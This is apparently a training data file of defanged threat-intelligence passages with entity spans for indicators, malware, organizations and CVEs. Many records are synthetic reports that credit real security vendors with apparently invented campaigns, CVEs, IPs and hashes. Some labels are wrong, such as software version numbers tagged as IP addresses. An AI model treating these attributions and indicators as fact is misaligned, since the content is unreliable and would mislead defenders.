{"text": "Blog Post by Palo Alto Unit 42: Tracking UNC2452's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2020-24628 against VMware ESXi deployments. The initial access vector involves spear-phishing emails from alert@auth-check[ . ]org delivering RemcosRAT. Post-compromise, the attackers deploy Ryuk and use LaZagne for reconnaissance. C2 infrastructure includes 104 [ . ] 143 [ . ] 5 [ . ] 41 and gateway-login[.]io. A staging server at hxxps://auth-static[ . ]xyz/wp-content/uploads/doc.php hosts additional tooling. Key artifact: /usr/local/bin/helper.sh (SHA256: 4605af2baca54892eb0e528de909c882e832bbb79835d920b82ccec650ad7829).", "spans": {"Organization: Palo Alto Unit 42": [[13, 30]], "Vulnerability: CVE-2020-24628": [[128, 142]], "System: VMware ESXi": [[151, 162]], "Indicator: alert@auth-check.org": [[238, 262]], "Malware: RemcosRAT": [[274, 283]], "Malware: Ryuk": [[323, 327]], "Indicator: 104.143.5.41": [[391, 421]], "Indicator: gateway-login.io": [[426, 444]], "Indicator: https://auth-static.xyz/wp-content/uploads/doc.php": [[466, 520]], "Indicator: 4605af2baca54892eb0e528de909c882e832bbb79835d920b82ccec650ad7829": [[595, 659]]}, "info": {"id": "synth_v2_01568", "source": "defanged_augment"}}
{"text": "Lazarus Group, also known as Hidden Cobra and attributed to North Korea's RGB, conducted the TraderTraitor campaign targeting cryptocurrency firms. The FBI and CISA published a joint advisory documenting the attacks. The group distributed trojanized cryptocurrency trading applications with SHA256 hashes e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1d2e3f4a5b6c7d8e9f0a1b2c3d4e5f6 and b9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b7c8d9e0f1a2b3c4d5e6f7a8b9c0. The applications connected to C2 infrastructure at api-trader[.]chainfund[.]io and exchange-data[.]cryptonode[.]org on port 8443. Malicious payloads were hosted at hxxps://api-trader[ . ]chainfund[ . ]io/v2/update/electron.asar. The backdoor was installed to /Library/Application Support/.daemon/updater and ~/Library/LaunchAgents/com.apple.update.plist on macOS targets. C2 IP addresses included 104[.]168[.]174[.]22 and 107 [ . ] 189 [ . ] 10 [ . ] 143. The group also used social engineering via LinkedIn, sending messages from accounts like recruit@hrnodes[ . ]io.", "spans": {"Organization: FBI": [[152, 155]], "Organization: CISA": [[160, 164]], "Indicator: e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1d2e3f4a5b6c7d8e9f0a1b2c3d4e5f6": [[305, 369]], "Indicator: b9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b7c8d9e0f1a2b3c4d5e6f7a8b9c0": [[374, 438]], "Indicator: api-trader.chainfund.io": [[491, 518]], "Indicator: exchange-data.cryptonode.org": [[523, 555]], "Indicator: hxxps://api-trader.chainfund.io/v2/update/electron.asar": [[604, 667]], "Indicator: 104.168.174.22": [[837, 857]], "Indicator: 107.189.10.143": [[862, 894]], "Indicator: recruit@hrnodes.io": [[985, 1007]], "System: macOS": [[797, 802]], "System: LinkedIn": [[939, 947]]}, "info": {"id": "malware_00020", "source": "defanged_augment"}}
{"text": "Blog Post by Europol: Tracking Scattered Spider's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2020-37651 against MOVEit Transfer deployments. The initial access vector involves spear-phishing emails from security@credential-check[.]site delivering Ryuk. Post-compromise, the attackers deploy SmokeLoader and use Havoc for reconnaissance. C2 infrastructure includes 114[.]50[.]7[.]170 and update-sync[.]top. A staging server at hxxp://nodeproxy[ . ]dev/portal/verify hosts additional tooling. Key artifact: /home/user/.config/shell.php (SHA256: 48543e3f2e319fbaaf263854e8b40567843b8858b0e07684f183e7166d1c66ce).", "spans": {"Organization: Europol": [[13, 20]], "Vulnerability: CVE-2020-37651": [[127, 141]], "System: MOVEit Transfer": [[150, 165]], "Indicator: security@credential-check.site": [[241, 273]], "Malware: Ryuk": [[285, 289]], "Malware: SmokeLoader": [[329, 340]], "Indicator: 114.50.7.170": [[402, 420]], "Indicator: update-sync.top": [[425, 442]], "Indicator: hxxp://nodeproxy.dev/portal/verify": [[464, 502]], "Indicator: 48543e3f2e319fbaaf263854e8b40567843b8858b0e07684f183e7166d1c66ce": [[581, 645]]}, "info": {"id": "synth_v2_01523", "source": "defanged_augment"}}
{"text": "Cisco Talos detected a multi-stage attack chain. The initial phishing email from notification@auth-check[ . ]org contained a link to hxxp://backup-portal[.]cc/gate.php. This redirected to hxxp://secureapi[ . ]io/download/update.exe on relay-auth[ . ]site. A secondary email from updates@document-share[ . ]link pointed to hxxp://relaycache[.]top/download/update.exe which delivered DarkSide. The final payload callback was hxxp://proxyportal[.]top/gate.php resolving to 172[.]233[.]189[.]178 via apisync[.]io.", "spans": {"Organization: Cisco Talos": [[0, 11]], "Indicator: notification@auth-check.org": [[81, 112]], "Indicator: http://backup-portal.cc/gate.php": [[133, 167]], "Indicator: hxxp://secureapi.io/download/update.exe": [[188, 231]], "Indicator: relay-auth.site": [[235, 254]], "Indicator: updates@document-share.link": [[279, 310]], "Indicator: hxxp://relaycache.top/download/update.exe": [[322, 365]], "Malware: DarkSide": [[382, 390]], "Indicator: http://proxyportal.top/gate.php": [[423, 456]], "Indicator: 172.233.189.178": [[470, 491]], "Indicator: apisync.io": [[496, 508]]}, "info": {"id": "synth_v2_01814", "source": "defanged_augment"}}
{"text": "Open sourced javascript info stealer, with the capabilities of stealing crypto wallets, password, cookies and modify discord clients hxxps://github[ . ]com/doener2323/doenerium", "spans": {"Indicator: https://github.com/doener2323/doenerium": [[133, 176]]}, "info": {"source": "defanged_augment", "name": "doenerium"}}
{"text": "OAuthenticator is an OAuth token library for the JupyerHub login handler. CILogonOAuthenticator is provided by the OAuthenticator package, and lets users log in to a JupyterHub via CILogon. This is primarily used to restrict a JupyterHub only to users of a given institute. The allowed_idps configuration trait of CILogonOAuthenticator is documented to be a list of domains that indicate the institutions whose users are authorized to access this JupyterHub. This authorization is validated by ensuring that the *email* field provided to us by CILogon has a *domain* that matches one of the domains listed in `allowed_idps`.If `allowed_idps` contains `berkeley[ . ]edu`, you might expect only users with valid current credentials provided by University of California, Berkeley to be able to access the JupyterHub. However, CILogonOAuthenticator does *not* verify which provider is used by the user to login, only the email address provided. So a user can login with a GitHub account that has email set to `<something>@berkeley[.]edu`, and that will be treated exactly the same as someone logging in using the UC Berkeley official Identity Provider. The patch fixing this issue makes a *breaking change* in how `allowed_idps` is interpreted. It's no longer a list of domains, but configuration representing the `EntityID` of the IdPs that are allowed, picked from the [list maintained by CILogon](hxxps://cilogon[ . ]org/idplist/). Users are advised to upgrade.", "spans": {"Indicator: https://cilogon.org/idplist/": [[1396, 1428]], "Indicator: berkeley.edu": [[652, 668], [1018, 1032]], "Organization: GitHub": [[968, 974]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2022-31027"}}
{"text": "First described by Kaspersky in 2014 and later by Cylance in 2017 , Machete is a piece of malware found to be targeting high profile individuals and organizations in Latin American countries . The initial indicator of the attack was a malicious Web shell that was detected on an IIS server , coming out of the w3wp[.]exe process .", "spans": {"Organization: Kaspersky": [[19, 28]], "Organization: Cylance": [[50, 57]], "Indicator: w3wp.exe": [[310, 320]]}, "info": {"id": "cyberner_stix_train_006775", "source": "defanged_augment"}}
{"text": "Forensic Investigation Notes: Analysis of the compromised host revealed Hashcat artifacts at C:\\Users\\Public\\Documents\\implant.so. Memory dump analysis confirmed execution of PowerView. Registry modifications pointed to persistence via /dev/shm/sam.hive. Network forensics identified connections to 196 [ . ] 218 [ . ] 79 [ . ] 70 and nodeportal[.]live. Email headers traced the initial vector to helpdesk@document-share[.]link. File /var/tmp/taskhost.exe (MD5: c6515cb220045fcce617de02f8fe2101) was identified as the initial dropper. A staging URL hxxp://proxy-portal[ . ]io/admin/config resolved to 184[.]77[.]100[.]203. Secondary artifact hash: SHA256: d39e3adb7100acd0703fe52a6097a1c21474858b1506a591f9aca812610b6e2d.", "spans": {"Indicator: 196.218.79.70": [[299, 330]], "Indicator: nodeportal.live": [[335, 352]], "Indicator: helpdesk@document-share.link": [[397, 427]], "Indicator: c6515cb220045fcce617de02f8fe2101": [[462, 494]], "Indicator: http://proxy-portal.io/admin/config": [[549, 588]], "Indicator: 184.77.100.203": [[601, 621]], "Indicator: d39e3adb7100acd0703fe52a6097a1c21474858b1506a591f9aca812610b6e2d": [[656, 720]]}, "info": {"id": "synth_v2_01236", "source": "defanged_augment"}}
{"text": "Incident Response Summary: On detection of anomalous traffic to 192[.]227[.]43[.]207, the NCSC IR team identified TrickBot running as C:\\Users\\admin\\Desktop\\backdoor.elf. The threat actor, believed to be FIN11, used GhostPack for credential harvesting and SharpHound for lateral movement. Exfiltrated data was sent to storage-gateway[.]org and updatenode[ . ]tech. The initial dropper (SHA256: 3efdb9dbe144dc9e664bbbfcfc5ebf2efb9b49ceb24a0c93791075f1b0dacc46) was delivered via a phishing email from security@mail-service[ . ]info. A second C2 node was observed at 103 [ . ] 23 [ . ] 251 [ . ] 221, with a persistence mechanism writing to C:\\ProgramData\\taskhost.exe.", "spans": {"Indicator: 192.227.43.207": [[64, 84]], "Organization: NCSC": [[90, 94]], "Malware: TrickBot": [[114, 122]], "Indicator: storage-gateway.org": [[318, 339]], "Indicator: updatenode.tech": [[344, 363]], "Indicator: 3efdb9dbe144dc9e664bbbfcfc5ebf2efb9b49ceb24a0c93791075f1b0dacc46": [[394, 458]], "Indicator: security@mail-service.info": [[500, 530]], "Indicator: 103.23.251.221": [[565, 597]]}, "info": {"id": "synth_v2_00288", "source": "defanged_augment"}}
{"text": "DNS analysis for Agent Tesla infrastructure: smtp-relay[[.]]icu resolved to 80 [ . ] 68 [ . ] 36 [ . ] 64, phish-kit[[.]]xyz resolved to 213[.]68[.]192[.]150, and share-files[[ . ]]biz was used as a DNS-over-HTTPS tunnel. The implant hash is a780ced71594af256b57e8911b0ab73a.", "spans": {"Malware: Agent Tesla": [[17, 28]], "Indicator: smtp-relay[.]icu": [[45, 63]], "Indicator: 80.68.36.64": [[76, 105]], "Indicator: phish-kit[.]xyz": [[107, 124]], "Indicator: 213.68.192.150": [[137, 157]], "Indicator: share-files[.]biz": [[163, 184]], "Indicator: a780ced71594af256b57e8911b0ab73a": [[242, 274]]}, "info": {"id": "synth_00014", "source": "defanged_augment"}}
{"text": "Google TAG detected a multi-stage attack chain. The initial phishing email from security@auth-check[.]org contained a link to hxxp://maildata[ . ]tech/gate.php. This redirected to hxxp://proxynode[.]tech/assets/js/payload.js on cdnbackup[.]org. A secondary email from service@credential-check[.]site pointed to hxxp://storagenode[ . ]xyz/api/v2/auth which delivered PikaBot. The final payload callback was hxxp://relay-backup[ . ]info/wp-content/uploads/doc.php resolving to 10 [ . ] 61 [ . ] 245 [ . ] 208 via syncstorage[ . ]com.", "spans": {"Organization: Google TAG": [[0, 10]], "Indicator: security@auth-check.org": [[80, 105]], "Indicator: http://maildata.tech/gate.php": [[126, 159]], "Indicator: hxxp://proxynode.tech/assets/js/payload.js": [[180, 224]], "Indicator: cdnbackup.org": [[228, 243]], "Indicator: service@credential-check.site": [[268, 299]], "Indicator: http://storagenode.xyz/api/v2/auth": [[311, 349]], "Malware: PikaBot": [[366, 373]], "Indicator: hxxp://relay-backup.info/wp-content/uploads/doc.php": [[406, 461]], "Indicator: 10.61.245.208": [[475, 506]], "Indicator: syncstorage.com": [[511, 530]]}, "info": {"id": "synth_v2_01731", "source": "defanged_augment"}}
{"text": "Malware Analysis Report: IcedID (SHA256: 073ef0072781e5ffc16ce5bd909ccc097d9f21765a28b97732d29731aaa27563). Upon execution on Windows Server 2019, the sample creates C:\\Users\\Public\\Documents\\chrome_helper.exe and injects into legitimate processes. Network analysis shows beaconing to 172 [ . ] 224 [ . ] 12 [ . ] 224 every 60 seconds and DNS queries to apidata[.]cc. The second stage was fetched from hxxps://edgesecure[ . ]org/login and written to C:\\Program Files\\Common Files\\loader.exe. The payload uses Certutil-style techniques for defense evasion. A secondary hash (SHA256: 7f22279bb920973cb46e02994674ecff74a47cd9be1eca2f2e637a53d001f1db) was extracted from the unpacked payload.", "spans": {"Malware: IcedID": [[25, 31]], "Indicator: 073ef0072781e5ffc16ce5bd909ccc097d9f21765a28b97732d29731aaa27563": [[41, 105]], "System: Windows Server 2019": [[126, 145]], "Indicator: 172.224.12.224": [[285, 317]], "Indicator: apidata.cc": [[354, 366]], "Indicator: https://edgesecure.org/login": [[402, 434]], "Indicator: 7f22279bb920973cb46e02994674ecff74a47cd9be1eca2f2e637a53d001f1db": [[582, 646]]}, "info": {"id": "synth_v2_00533", "source": "defanged_augment"}}
{"text": "Phishing Campaign Report: Huntress identified a large-scale phishing operation. Emails originated from report@account-update[ . ]xyz and billing@login-portal[ . ]tech, spoofing legitimate services. Victims were directed to hxxp://apirelay[ . ]info/secure/token which hosted a credential harvesting page on edge-portal[.]xyz. A secondary link hxxp://backuplogin[ . ]live/login delivered Qbot (SHA256: da2e3d0c8d304194d39c9aa3b1ca09580e54e3029bdab02c77cb7946e22ab787). The malware was saved to C:\\Users\\admin\\Desktop\\runtime.dll and established C2 with 192[.]182[.]195[.]229.", "spans": {"Organization: Huntress": [[26, 34]], "Indicator: report@account-update.xyz": [[103, 132]], "Indicator: billing@login-portal.tech": [[137, 166]], "Indicator: http://apirelay.info/secure/token": [[223, 260]], "Indicator: edge-portal.xyz": [[306, 323]], "Indicator: http://backuplogin.live/login": [[342, 375]], "Malware: Qbot": [[386, 390]], "Indicator: da2e3d0c8d304194d39c9aa3b1ca09580e54e3029bdab02c77cb7946e22ab787": [[400, 464]], "Indicator: 192.182.195.229": [[551, 572]]}, "info": {"id": "synth_v2_01033", "source": "defanged_augment"}}
{"text": "TensorFlow is an end-to-end open source platform for machine learning. In affected versions providing a negative element to `num_elements` list argument of `tf.raw_ops.TensorListReserve` causes the runtime to abort the process due to reallocating a `std::vector` to have a negative number of elements. The [implementation](hxxps://github[ . ]com/tensorflow/tensorflow/blob/8d72537c6abf5a44103b57b9c2e22c14f5f49698/tensorflow/core/kernels/list_kernels.cc#L312) calls `std::vector.resize()` with the new size controlled by input given by the user, without checking that this input is valid. We have patched the issue in GitHub commit 8a6e874437670045e6c7dc6154c7412b4a2135e2. The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.", "spans": {"Indicator: https://github.com/tensorflow/tensorflow/blob/8d72537c6abf5a44103b57b9c2e22c14f5f49698/tensorflow/core/kernels/list_kernels.cc#L312": [[323, 458]], "Indicator: 8a6e874437670045e6c7dc6154c7412b4a2135e2": [[632, 672]], "Organization: GitHub": [[618, 624]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2021-37644"}}
{"text": "FireEye published a threat intelligence report linking Mustang Panda to a new campaign exploiting CVE-2022-25256 in Palo Alto PAN-OS. The attackers deployed PlugX via BloodHound, establishing C2 communication with 40 [ . ] 43 [ . ] 57 [ . ] 190 and authbackup[ . ]online. A secondary payload was downloaded from hxxp://updatestorage[ . ]xyz/wp-content/uploads/doc.php. The malware binary (SHA1: 174dfec32c8c594e215f44d70f76b0404284931a) was dropped to /usr/local/bin/dropper.ps1. Phishing emails were sent from verify@document-share[.]link targeting enterprise users. A backup C2 server was identified at 10[.]75[.]147[.]4.", "spans": {"Organization: FireEye": [[0, 7]], "Vulnerability: CVE-2022-25256": [[98, 112]], "System: Palo Alto PAN-OS": [[116, 132]], "Malware: PlugX": [[157, 162]], "Indicator: 40.43.57.190": [[214, 244]], "Indicator: authbackup.online": [[249, 270]], "Indicator: hxxp://updatestorage.xyz/wp-content/uploads/doc.php": [[312, 367]], "Indicator: 174dfec32c8c594e215f44d70f76b0404284931a": [[395, 435]], "Indicator: verify@document-share.link": [[511, 539]], "Indicator: 10.75.147.4": [[605, 622]]}, "info": {"id": "synth_v2_00189", "source": "defanged_augment"}}
{"text": "Vulnerability in the Java SE, Java SE Embedded, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Libraries). Supported versions that are affected are Java SE: 7u291, 8u281, 11.0.10, 16; Java SE Embedded: 8u281; Oracle GraalVM Enterprise Edition: 19.3.5, 20 [ . ] 3 [ . ] 1 [ . ] 2 and 21 [ . ] 0 [ . ] 0 [ . ] 2. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Java SE, Java SE Embedded, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. It can also be exploited by supplying untrusted data to APIs in the specified Component. CVSS 3.1 Base Score 5.9 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N).", "spans": {"Indicator: 20.3.1.2": [[277, 303]], "Indicator: 21.0.0.2": [[308, 334]], "System: Java": [[21, 25], [30, 34], [100, 104], [173, 177], [209, 213], [460, 464], [469, 473], [656, 660], [665, 669], [770, 774], [878, 882]], "Organization: Oracle": [[48, 54], [93, 99], [234, 240], [487, 493], [683, 689]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2021-2161"}}
{"text": "Phishing Campaign Report: Kaspersky GReAT identified a large-scale phishing operation. Emails originated from service@identity-verify[ . ]cc and it@identity-verify[ . ]cc, spoofing legitimate services. Victims were directed to hxxps://securestatic[ . ]live/collect which hosted a credential harvesting page on storage-storage[ . ]xyz. A secondary link hxxp://login-storage[.]online/portal/verify delivered StealC (SHA1: 6fc7007f58cc5584914a46c4d4333999c92f9dcb). The malware was saved to C:\\Program Files\\Common Files\\svchost.exe and established C2 with 189 [ . ] 152 [ . ] 69 [ . ] 149.", "spans": {"Organization: Kaspersky GReAT": [[26, 41]], "Indicator: service@identity-verify.cc": [[110, 140]], "Indicator: it@identity-verify.cc": [[145, 170]], "Indicator: https://securestatic.live/collect": [[227, 264]], "Indicator: storage-storage.xyz": [[310, 333]], "Indicator: hxxp://login-storage.online/portal/verify": [[352, 395]], "Malware: StealC": [[406, 412]], "Indicator: 6fc7007f58cc5584914a46c4d4333999c92f9dcb": [[420, 460]], "Indicator: 189.152.69.149": [[554, 586]]}, "info": {"id": "synth_v2_00875", "source": "defanged_augment"}}
{"text": "Malware Analysis Report: XLoader (SHA1: 038433fda6e93adcf2f6b92249df058a5d144b9c). Upon execution on MOVEit Transfer, the sample creates /dev/shm/loader.exe and injects into legitimate processes. Network analysis shows beaconing to 17 [ . ] 43 [ . ] 74 [ . ] 198 every 60 seconds and DNS queries to mail-sync[ . ]site. The second stage was fetched from hxxps://relaystorage[.]info/portal/verify and written to /dev/shm/lsass.dmp. The payload uses Seatbelt-style techniques for defense evasion. A secondary hash (SHA256: da5728de5cff60ed9bfd581adfa2150989cc57af5f803e8d755f97f65e01c475) was extracted from the unpacked payload.", "spans": {"Malware: XLoader": [[25, 32]], "Indicator: 038433fda6e93adcf2f6b92249df058a5d144b9c": [[40, 80]], "System: MOVEit Transfer": [[101, 116]], "Indicator: 17.43.74.198": [[232, 262]], "Indicator: mail-sync.site": [[299, 317]], "Indicator: https://relaystorage.info/portal/verify": [[353, 394]], "Indicator: da5728de5cff60ed9bfd581adfa2150989cc57af5f803e8d755f97f65e01c475": [[520, 584]]}, "info": {"id": "synth_v2_00585", "source": "defanged_augment"}}
{"text": "Typically , however , cybercriminals first test-run a technology on the Russian sector of the Internet and then roll it out globally , attacking users in other countries . The codename for Turla APT group in this presentation is MAKERSMARK . Winnti : CLR[.]exe . We searched for the unique string and identified a single match to a cyber range ( aka polygon ) developed by Rostelecom - Solar , a Russian cyber security company that received a government in 2019 to begin training cyber security experts and conducting electric power disruption and emergency response exercises .", "spans": {"Indicator: CLR.exe": [[251, 260]], "Organization: cyber range": [[332, 343]], "Organization: Rostelecom - Solar": [[373, 391]], "Organization: Russian cyber security company": [[396, 426]]}, "info": {"id": "cyberner_stix_train_002033", "source": "defanged_augment"}}
{"text": "Shamoon2 : 104 [ . ] 218 [ . ] 120 [ . ] 128 .", "spans": {"Malware: Shamoon2": [[0, 8]], "Indicator: 104.218.120.128": [[11, 44]]}, "info": {"id": "cyberner_stix_train_007250", "source": "defanged_augment"}}
{"text": "Artifact Analysis for Lumma Stealer campaign:\nStage 1 dropper at C:\\Windows\\System32\\update.dll - SHA1: 8bbb74922c4ac80bb9548a9ca50a0cf07773f406\nStage 2 loader at C:\\Users\\admin\\Desktop\\dropper.ps1 - SHA256: 19549578513cec2aef4c23c919224015c87e850eab68f36d646b1f7a69bd56c1\nFinal payload at C:\\Windows\\System32\\shell.php - SHA1: 1aef6245b355faa7477201663bf9fae816bdc935\nExfiltration module - SHA1: 4cab829dd8d16c3f9e61f4599232857f479198c8\nAll stages communicated with 88[.]21[.]88[.]238. Mythic signatures detected in Stage 2.", "spans": {"Malware: Lumma Stealer": [[22, 35]], "Indicator: 8bbb74922c4ac80bb9548a9ca50a0cf07773f406": [[104, 144]], "Indicator: 19549578513cec2aef4c23c919224015c87e850eab68f36d646b1f7a69bd56c1": [[208, 272]], "Indicator: 1aef6245b355faa7477201663bf9fae816bdc935": [[328, 368]], "Indicator: 4cab829dd8d16c3f9e61f4599232857f479198c8": [[397, 437]], "Indicator: 88.21.88.238": [[467, 485]]}, "info": {"id": "synth_v2_01855", "source": "defanged_augment"}}
{"text": "Incident Response Summary: On detection of anomalous traffic to 125 [ . ] 224 [ . ] 114 [ . ] 227, the Rapid7 IR team identified Gootloader running as C:\\Users\\admin\\Downloads\\svchost.exe. The threat actor, believed to be Turla, used Metasploit for credential harvesting and Burp Suite for lateral movement. Exfiltrated data was sent to sync-login[.]net and edge-node[.]link. The initial dropper (SHA1: 057b8eafab20c3e2af169470e2becbae2a3e3c97) was delivered via a phishing email from billing@phishing-domain[.]com. A second C2 node was observed at 172[.]132[.]54[.]237, with a persistence mechanism writing to C:\\Users\\admin\\AppData\\Local\\Temp\\dropper.ps1.", "spans": {"Indicator: 125.224.114.227": [[64, 97]], "Organization: Rapid7": [[103, 109]], "Malware: Gootloader": [[129, 139]], "Indicator: sync-login.net": [[337, 353]], "Indicator: edge-node.link": [[358, 374]], "Indicator: 057b8eafab20c3e2af169470e2becbae2a3e3c97": [[403, 443]], "Indicator: billing@phishing-domain.com": [[485, 514]], "Indicator: 172.132.54.237": [[549, 569]]}, "info": {"id": "synth_v2_00429", "source": "defanged_augment"}}
{"text": "Trend Micro detected a multi-stage attack chain. The initial phishing email from alert@phishing-domain[ . ]com contained a link to hxxps://secure-auth[.]club/callback. This redirected to hxxps://secure-cdn[.]tech/callback on logincloud[ . ]site. A secondary email from support@account-update[ . ]xyz pointed to hxxp://cdnportal[.]dev/admin/config which delivered Cobalt Strike. The final payload callback was hxxps://storage-edge[ . ]io/portal/verify resolving to 192 [ . ] 192 [ . ] 251 [ . ] 104 via cachesync[.]net.", "spans": {"Organization: Trend Micro": [[0, 11]], "Indicator: alert@phishing-domain.com": [[81, 110]], "Indicator: https://secure-auth.club/callback": [[131, 166]], "Indicator: hxxps://secure-cdn.tech/callback": [[187, 221]], "Indicator: logincloud.site": [[225, 244]], "Indicator: support@account-update.xyz": [[269, 299]], "Indicator: http://cdnportal.dev/admin/config": [[311, 346]], "Malware: Cobalt Strike": [[363, 376]], "Indicator: https://storage-edge.io/portal/verify": [[409, 450]], "Indicator: 192.192.251.104": [[464, 497]], "Indicator: cachesync.net": [[502, 517]]}, "info": {"id": "synth_v2_01838", "source": "defanged_augment"}}
{"text": "Artifact Analysis for BlackCat campaign:\nStage 1 dropper at C:\\Windows\\Tasks\\helper.sh - SHA256: 640a97f94a3ac1e0811517f9f39a4a12ae08219a956019a463e072ab2e26838f\nStage 2 loader at C:\\Users\\Public\\Documents\\lsass.dmp - SHA1: 587f425dcf610f037b556aafd402842a7712c79d\nFinal payload at /tmp/helper.sh - SHA1: e77ef94cf33dea9f8d97c062da655c970346b606\nExfiltration module - SHA256: 1c13f53bc228670d512451a477167e756f7a3109b010fc97f20317e954756bb7\nAll stages communicated with 10[.]254[.]87[.]79. Burp Suite signatures detected in Stage 2.", "spans": {"Malware: BlackCat": [[22, 30]], "Indicator: 640a97f94a3ac1e0811517f9f39a4a12ae08219a956019a463e072ab2e26838f": [[97, 161]], "Indicator: 587f425dcf610f037b556aafd402842a7712c79d": [[224, 264]], "Indicator: e77ef94cf33dea9f8d97c062da655c970346b606": [[305, 345]], "Indicator: 1c13f53bc228670d512451a477167e756f7a3109b010fc97f20317e954756bb7": [[376, 440]], "Indicator: 10.254.87.79": [[470, 488]]}, "info": {"id": "synth_v2_01937", "source": "defanged_augment"}}
{"text": "A backdoor also known as: JS:Trojan.JS.Redirector.BS JS[.]Redirector[.]DE JS:Trojan.JS.Redirector.BS JS/Redir.WI Trojan.Malscript!html JS:Trojan.JS.Redirector.BS JS:Trojan.JS.Redirector.BS Trojan.Script.Expack.drqfka JS:Trojan.JS.Redirector.BS JS:Trojan.JS.Redirector.BS BehavesLike.PDF.Trojan.db JS/Redir.WI TrojanDownloader.JS.aufd JS/Redirector.OA.1 JS:Trojan.JS.Redirector.BS", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: JS.Redirector.DE": [[53, 73]]}, "info": {"id": "cyner2_train_005423", "source": "defanged_augment"}}
{"text": "Customers have to send a set text message from their phone to a specific bank number . Skipper , which has been linked to Turla in the past , was found alongside Gazer in most cases we investigated . Winnti : C&C : b[org_name][.]dnslookup[.]services : 443 . Organizations can collect this intelligence , review the threats described , consider if and how the threat is relevant to them , and the necessity of making any potential additional mitigations .", "spans": {"Indicator: b[org_name].dnslookup.services": [[215, 249]], "Organization: Organizations": [[258, 271]]}, "info": {"id": "cyberner_stix_train_004216", "source": "defanged_augment"}}
{"text": "The malicious document – Hotel_Reservation_Form[.]doc ( MD5 : 9b10685b774a783eabfecdb6119a8aa3 ) , contains a macro that base64 decodes a dropper that then deploys APT28 ’s signature GAMEFISH malware ( MD5 : 1421419d1be31f1f9ea60e8ed87277db ) , which uses mvband[.]net and mvtband[.]net as command and control ( C2 ) domains .", "spans": {"Indicator: Hotel_Reservation_Form.doc": [[25, 53]], "Indicator: 9b10685b774a783eabfecdb6119a8aa3": [[62, 94]], "Malware: GAMEFISH": [[183, 191]], "Indicator: 1421419d1be31f1f9ea60e8ed87277db": [[208, 240]], "Indicator: mvband.net": [[256, 268]], "Indicator: mvtband.net": [[273, 286]]}, "info": {"id": "cyberner_stix_train_006683", "source": "defanged_augment"}}
{"text": "Malware Analysis Report: BatLoader (MD5: 871b258a3b957b58be76ab0289ae84db). Upon execution on Citrix NetScaler, the sample creates /home/user/.config/implant.so and injects into legitimate processes. Network analysis shows beaconing to 172[.]140[.]198[.]206 every 60 seconds and DNS queries to sync-cache[.]net. The second stage was fetched from hxxp://securerelay[.]info/login and written to /opt/app/bin/ntds.dit. The payload uses Metasploit-style techniques for defense evasion. A secondary hash (SHA256: 4f9f9d9f947a8457211b27ec145af1de85f10717333923d522cd6716fa4d5b36) was extracted from the unpacked payload.", "spans": {"Malware: BatLoader": [[25, 34]], "Indicator: 871b258a3b957b58be76ab0289ae84db": [[41, 73]], "System: Citrix NetScaler": [[94, 110]], "Indicator: 172.140.198.206": [[236, 257]], "Indicator: sync-cache.net": [[294, 310]], "Indicator: hxxp://securerelay.info/login": [[346, 377]], "Indicator: 4f9f9d9f947a8457211b27ec145af1de85f10717333923d522cd6716fa4d5b36": [[508, 572]]}, "info": {"id": "synth_v2_00578", "source": "defanged_augment"}}
{"text": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit Studio Photo 3 [ . ] 6 [ . ] 6 [ . ] 922. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of NEF files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated structure. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-11194.", "spans": {"Indicator: 3.6.6.922": [[117, 144]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2020-17421"}}
{"text": "Blog Post by Palo Alto Unit 42: Tracking Volt Typhoon's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2020-46781 against SonicWall SMA deployments. The initial access vector involves spear-phishing emails from billing@account-update[.]xyz delivering PlugX. Post-compromise, the attackers deploy Raccoon Stealer and use Seatbelt for reconnaissance. C2 infrastructure includes 39[.]207[.]177[.]139 and cloudportal[.]live. A staging server at hxxp://login-mail[ . ]xyz/panel/index.html hosts additional tooling. Key artifact: C:\\Users\\admin\\AppData\\Local\\Temp\\implant.so (MD5: 171dd901e782e4020d65d365798562b6).", "spans": {"Organization: Palo Alto Unit 42": [[13, 30]], "Vulnerability: CVE-2020-46781": [[133, 147]], "System: SonicWall SMA": [[156, 169]], "Indicator: billing@account-update.xyz": [[245, 273]], "Malware: PlugX": [[285, 290]], "Malware: Raccoon Stealer": [[330, 345]], "Indicator: 39.207.177.139": [[410, 430]], "Indicator: cloudportal.live": [[435, 453]], "Indicator: http://login-mail.xyz/panel/index.html": [[475, 517]], "Indicator: 171dd901e782e4020d65d365798562b6": [[609, 641]]}, "info": {"id": "synth_v2_01645", "source": "defanged_augment"}}
{"text": "Haniyeh_will_remain_abroad_and_Hamas_rises_in_Gaza[ . ]pdf : 5b476e05aacea9edc14f7e4bab1b724ef54915f30c39ac87503ed395feae611e .", "spans": {"Indicator: Haniyeh_will_remain_abroad_and_Hamas_rises_in_Gaza.pdf": [[0, 58]], "Indicator: 5b476e05aacea9edc14f7e4bab1b724ef54915f30c39ac87503ed395feae611e": [[61, 125]]}, "info": {"id": "cyberner_stix_train_005533", "source": "defanged_augment"}}
